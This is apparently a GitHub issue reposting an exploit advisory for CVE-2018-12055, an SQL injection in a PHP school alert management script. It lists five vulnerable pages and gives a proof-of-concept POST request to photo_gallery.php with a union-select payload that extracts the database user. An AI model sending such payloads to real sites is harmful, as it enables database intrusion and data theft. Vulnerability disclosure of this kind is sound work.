Open
Description
=================
Schools Alert Management Script - SQL Injections
Date: 07.06.2018
Vendor Homepage: https://www.phpscriptsmall.com/
Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
Category: Web Application
Exploit Author: xiaotian.wang From DBAppSecurity
Tested on: Linux Mint
CVE: CVE-2018-12055
=================
Vulnerable cgi:
- contact_us.php
- faq.php
- about.php
- photo_gallery.php
- privacy.php
=================
Proof of Concept:
POST http://localhost/[PATH]/photo_gallery.php
DATA xxx'/**/union/**/all/**/select/**/1,user(),3,4#
Metadata
Metadata
Assignees
Labels
No labels
